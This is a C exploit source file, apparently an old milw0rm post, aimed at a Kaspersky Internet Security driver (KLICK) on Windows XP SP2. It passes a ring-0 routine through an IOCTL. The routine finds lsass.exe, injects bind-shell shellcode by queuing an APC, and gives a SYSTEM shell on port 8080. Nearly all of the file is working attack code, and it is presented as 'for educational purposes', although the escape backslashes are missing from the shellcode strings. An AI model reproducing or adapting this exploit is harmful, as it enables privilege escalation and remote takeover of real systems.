Code:
////////////////////////////////////
///// AVP (Kaspersky)
////////////////////////////////////
//// FOR EDUCATIONAL PURPOSES ONLY
//// Kernel Privilege Escalation #2
//// Exploit
//// Rubén Santamarta
//// www.reversemode.com
//// 01/09/2006
////
////
////Modify by Nanika
////naninb[at]gmail.com
////nanika[at]chroot.org
////Exploit Get SYSTEM SHELL PORT 8080
////WindowsXP Version SP2+ Kaspersky Internet Security 6.0.0.303
////Do not Enable Hardware DEP
////Reference:
////http://hitcon.org/download/2005/Windows_Kernel_Shellcode_Exploit.pdf
////http://research.eeye.com/html/Papers/download/StepIntoTheRing.pdf
////http://www.security.org.sg/code/sdtrestore.html
////http://www.reversemode.com/
////
////
////
////I AM NOT Japanese :P
////§Æ±æ¯à µ¹¤@¨Ç¬ã¨sKernel Exploitªº¤H¦³¤@¨ÇÀ°§U
////¤À¨É¬O¦³¯qªº
////////////////////////////////////
#define sysenter __asm __emit 0x0f __asm __emit 0x34
#include <windows.h>
#include <stdio.h>
#define STATUS_SUCCESS ((NTSTATUS)0x00000000L)
#define STATUS_INFO_LENGTH_MISMATCH ((NTSTATUS)0xC0000004L)
#define OBJ_CASE_INSENSITIVE 0x00000040L
#define PAGE_READONLY 0x02
#define PAGE_READWRITE 0x04
#define DEF_KERNEL_BASE 0x80400000L
#define SystemModuleInformation 11
#define PROT_MEMBASE 0x80000000
typedef LONG NTSTATUS;
typedef struct _SYSTEM_MODULE_INFORMATION
{
ULONG Reserved[2];
PVOID Base;
ULONG Size;
ULONG Flags;
USHORT Index;
USHORT Unknown;
USHORT LoadCount;
USHORT ModuleNameOffset;
CHAR ImageName[256];
} SYSTEM_MODULE_INFORMATION;
NTSTATUS (WINAPI * _NtQuerySystemInformation)(UINT, PVOID, ULONG, PULONG);
HINSTANCE base;
DWORD *kbase;
int *ExAllocatePool;
int *KeInitializeApc;
int *KeInsertQueueApc;
int *ZwYieldExecution;
unsigned char code[] =
//USER MODE Shellcode bind port 8080
//470bytes
"x90x90x90x90x90"
"x83xecx34x8bxf4xe8x47x01x00x00x89x06xffx36x68x8e"
"x4ex0execxe8x61x01x00x00x89x46x08xffx36x68xadxd9"
"x05xcexe8x52x01x00x00x89x46x0cx68x6cx6cx00x00x68"
"x33x32x2ex64x68x77x73x32x5fx54xffx56x08x89x46x04"
"xffx36x68x72xfexb3x16xe8x2dx01x00x00x89x46x10xff"
"x36x68x7exd8xe2x73xe8x1ex01x00x00x89x46x14xffx76"
"x04x68xcbxedxfcx3bxe8x0ex01x00x00x89x46x18xffx76"
"x04x68xd9x09xf5xadxe8xfex00x00x00x89x46x1cxffx76"
"x04x68xa4x1ax70xc7xe8xeex00x00x00x89x46x20xffx76"
"x04x68xa4xadx2exe9xe8xdex00x00x00x89x46x24xffx76"
"x04x68xe5x49x86x49xe8xcex00x00x00x89x46x28xffx76"
"x04x68xe7x79xc6x79xe8xbex00x00x00x89x46x2cx33xff"
"x81xecx90x01x00x00x54x68x01x01x00x00xffx56x18x50"
"x50x50x50x40x50x40x50xffx56x1cx8bxd8x57x57x68x02"
"x00x1fx90x8bxccx6ax16x51x53xffx56x20x57x53xffx56"
"x24x57x51x53xffx56x28x8bxd0x68x65x78x65x00x68x63"
"x6dx64x2ex89x66x30x83xecx54x8dx3cx24x33xc0x33xc9"
"x83xc1x15xabxe2xfdxc6x44x24x10x44xfex44x24x3dx89"
"x54x24x48x89x54x24x4cx89x54x24x50x8dx44x24x10x54"
"x50x51x51x51x6ax01x51x51xffx76x30x51xffx56x10x8b"
"xccx6axffxffx31xffx56x0cx8bxc8x57xffx56x2cxffx56"
"x14x55x56x64xa1x30x00x00x00x85xc0x78x0cx8bx40x0c"
"x8bx70x1cxadx8bx68x08xebx09x8bx40x34x8bxa8xb8x00"
"x00x00x8bxc5x5ex5dxc2x04x00x53x55x56x57x8bx6cx24"
"x18x8bx45x3cx8bx54x05x78x03xd5x8bx4ax18x8bx5ax20"
"x03xddxe3x32x49x8bx34x8bx03xf5x33xffxfcx33xc0xac"
"x3axc4x74x07xc1xcfx0dx03xf8xebxf2x3bx7cx24x14x75"
"xe1x8bx5ax24x03xddx66x8bx0cx4bx8bx5ax1cx03xddx8b"
"x04x8bx03xc5xebx02x33xc0x8bxd5x5fx5ex5dx5bxc2x04"
"x00";
void Ring0Function()
{
/*
printf("----[RING0]----n");
printf("Hello From Ring0!n");
printf("----[RING0]----nn");
WinExec("cmd.exe",SW_SHOW);
*/
__asm
{
nop
nop
nop
nop
nop
nop
nop
nop
/*start here*/
mov eax,fs:[0x124]//TEB
mov esi,[eax+0x44]//EPROCESS
mov eax,esi
search:
mov eax,[eax+0x88] //activeprocess
sub eax,0x88
// cmp dword ptr[eax+0x84],0x444//EPROCESS_PID
cmp dword ptr[eax+0x174],'sasl'//FileName lsass.exe
jne search
// mov ebx,dword ptr[eax+0xc8]//system token
mov ebx,eax
lea esi,code//code
mov ecx,0x1d6// code = 0x1d6
mov dword ptr[edi],0xffdf0800//Kernel ffdf0000=user 7ffe0000
push edi
mov edi,[edi]
rep movsb
pop edi
mov ecx,dword ptr[ebx+0x190]
finddelay:
mov ecx,[ecx]
cmp byte ptr[ecx-0x1ff],0x5//1ff =ethread list - state 0x5=wait
jnz finddelay
sub ecx,0x22c
mov ebp,ecx
push 0x30//APC Object sizeof
push 0 //Nonpage
mov eax,ExAllocatePool//ExAllocatePool for APC Object
call eax//call ExAllocatePool
mov esi,eax
xor edx,edx
push edx//NULL
push 01//UserMode
// push dword ptr[edi]//user mode shellcode
mov eax,0x7ffe0800//user mode shellcode
push eax//User Mode routine
push edx//NULL
mov eax,ZwYieldExecution//0x804dd668//804dd237=kernel routine ret
push eax//Kernel Mode routine
push edx//NULL
push ebp//ETHREAD
push esi//APC object
mov eax,KeInitializeApc //initialize APC
call eax
xor ecx,ecx
xor edx,edx
xor eax,eax
push eax
push eax
push ebp//ETHREAD
push esi//APC Object
mov eax,KeInsertQueueApc
call eax
// test eax,eax
// jz recall
mov byte ptr[ebp+0x4a],0x1
/*
push 0x80000000
push 0
push 0
mov eax,0x804dd4b8
call eax
*/
/*
yeldloop:
mov eax,0x804df4d5
call eax
jmp yeldloop
*/
iretd
/*end here*/
int 3
NOP
NOP
NOP
NOP
NOP
NOP
NOP
NOP
}
exit(1);
//printf("WindowsXP Version :Pnn");
}
BOOL getNativeAPIs(void)
{
HMODULE hntdll;
hntdll = GetModuleHandle("ntdll.dll");
*(FARPROC *)&_NtQuerySystemInformation =
GetProcAddress(hntdll, "ZwQuerySystemInformation");
if(_NtQuerySystemInformation)
{
return TRUE;
}
return FALSE;
}
DWORD getKernelBase(void)
{
HANDLE hHeap = GetProcessHeap();
NTSTATUS Status;
ULONG cbBuffer = 0x8000;
PVOID pBuffer = NULL;
DWORD retVal = DEF_KERNEL_BASE;
do
{
pBuffer = HeapAlloc(hHeap, 0, cbBuffer);
if (pBuffer == NULL)
return DEF_KERNEL_BASE;
Status = _NtQuerySystemInformation(SystemModuleInformation,
pBuffer, cbBuffer, NULL);
if(Status == STATUS_INFO_LENGTH_MISMATCH)
{
HeapFree(hHeap, 0, pBuffer);
cbBuffer *= 2;
}
else if(Status != STATUS_SUCCESS)
{
HeapFree(hHeap, 0, pBuffer);
return DEF_KERNEL_BASE;
}
}
while (Status == STATUS_INFO_LENGTH_MISMATCH);
DWORD numEntries = *((DWORD *)pBuffer);
SYSTEM_MODULE_INFORMATION *smi = (SYSTEM_MODULE_INFORMATION *)((char *)pBuffer + sizeof(DWORD));
for(DWORD i = 0; i < numEntries; i++)
{
if(strcmpi(smi->ImageName, "ntoskrnl.exe"))
{
printf("%.8X - %sn", smi->Base, smi->ImageName);
retVal = (DWORD)(smi->Base);
break;
}
smi++;
}
HeapFree(hHeap, 0, pBuffer);
return retVal;
}
VOID ShowError()
{
LPVOID lpMsgBuf;
FormatMessage(FORMAT_MESSAGE_ALLOCATE_BUFFER| FORMAT_MESSAGE_FROM_SYSTEM,
NULL,
GetLastError(),
MAKELANGID(LANG_NEUTRAL, SUBLANG_DEFAULT),
(LPTSTR) &lpMsgBuf,
0,
NULL);
MessageBoxA(0,(LPTSTR)lpMsgBuf,"Error",0);
exit(1);
}
int main(int argc, char *argv[])
{
DWORD InBuff[1];
DWORD dwIOCTL,OutSize,InSize,junk;
HANDLE hDevice;
OSVERSIONINFO ov;
system("cls");
printf("#######################n");
printf("## AVP Ring0 Exploit ##n");
printf("#######################n");
printf("Ruben Santamartanwww.reversemode.comnn");
printf("Modify by Nanikann");
printf("naninb[at]gmail.comn");
printf("www.chroot.orgn");
printf("WindowsXP Version SP2+ Kaspersky Internet Security 6.0.0.303 :Pn");
ov.dwOSVersionInfoSize = sizeof(ov);
GetVersionEx(&ov);
if(ov.dwMajorVersion != 5)
{
printf("Sorry, this version supports only WinXP.n");
return 1;
}
if(ov.dwMinorVersion != 1)
{
printf("Sorry, this version supports only WinXP.n");
return 1;
}
getNativeAPIs();
kbase=(unsigned long *)getKernelBase();
base=LoadLibrary("ntoskrnl.exe");
ExAllocatePool=(int *)GetProcAddress(base,"ExAllocatePool");
KeInitializeApc=(int *)GetProcAddress(base,"KeInitializeApc");
KeInsertQueueApc=(int *)GetProcAddress(base,"KeInsertQueueApc");
ZwYieldExecution=(int *)GetProcAddress(base,"ZwYieldExecution");
ExAllocatePool=(int *)((int *)ExAllocatePool - (int *)base+(int *)kbase);
KeInitializeApc=(int *)((int *)KeInitializeApc-(int *)base+(int *)kbase);
KeInsertQueueApc=(int *)((int *)KeInsertQueueApc-(int *)base+(int *)kbase);
ZwYieldExecution=(int *)((int *)ZwYieldExecution-(int *)base+(int *)kbase);
FreeLibrary(base);
hDevice = CreateFile("\\.\KLICK",
0,
0,
NULL,
3,
0,
0);
//////////////////////
///// INFO
//////////////////////
if (hDevice == INVALID_HANDLE_VALUE) ShowError();
printf("[!] KLICK Device Handle [%x]n",hDevice);
//////////////////////
///// BUFFERS
//////////////////////
InSize = 0x8;
InBuff[0] =(DWORD) Ring0Function; // Ring0 ShellCode Address
//////////////////////
///// IOCTL
//////////////////////
dwIOCTL = 0x80052110;
printf("[!] IOCTL [0x%x]nn",dwIOCTL);
printf("Exploit TEST!!!!!!!!!!nn");
printf("Telnet x.x.x.x 8080 get SYSTEM shell!!!!!!!! :Pnn");
DeviceIoControl(hDevice,
dwIOCTL,
InBuff,0x8,
(LPVOID)NULL,0,
&junk,
NULL);
}
// milw0rm.com [2006-10-29] |
